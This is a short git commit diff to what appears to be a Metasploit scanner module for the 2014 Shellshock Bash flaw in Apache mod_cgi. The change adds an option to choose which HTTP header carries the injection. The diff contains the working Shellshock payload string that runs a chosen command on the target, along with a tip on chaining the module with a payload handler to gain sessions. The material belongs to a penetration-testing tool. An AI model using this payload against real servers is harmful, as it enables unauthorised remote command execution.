Add header specification to check module, lands #3902

2014-09-27 12:58:29 -05:00 · 2014-09-27 12:58:29 -05:00 · 64dbc396dd
parent c75a0185ec 044eeb87a0
commit 64dbc396dd
1 changed files with 6 additions and 4 deletions
--- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
+++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@ -17,7 +17,7 @@ class Metasploit4 < Msf::Auxiliary
      'Description' => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting Apache mod_cgi scripts through
-        the HTTP_USER_AGENT variable.
+        the HTTP_USER_AGENT variable by default.

        PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your
        CMD, set ExitOnSession false, run -j, and then run this module to create
@ -38,8 +38,8 @@ class Metasploit4 < Msf::Auxiliary

    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script']),
-      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET',
-        ['GET', 'POST']]),
+      OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
+      OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
      OptString.new('CMD', [true, 'Command to run (absolute paths required)',
        '/usr/bin/id'])
    ], self.class)
@ -98,7 +98,9 @@ class Metasploit4 < Msf::Auxiliary
    send_request_cgi(
      'method' => datastore['METHOD'],
      'uri' => normalize_uri(target_uri.path),
-      'agent' => "() { :;};echo #{@marker}$(#{cmd})#{@marker}"
+      'headers' => {
+        datastore['HEADER'] => "() { :;};echo #{@marker}$(#{cmd})#{@marker}"
+      }
    )
  end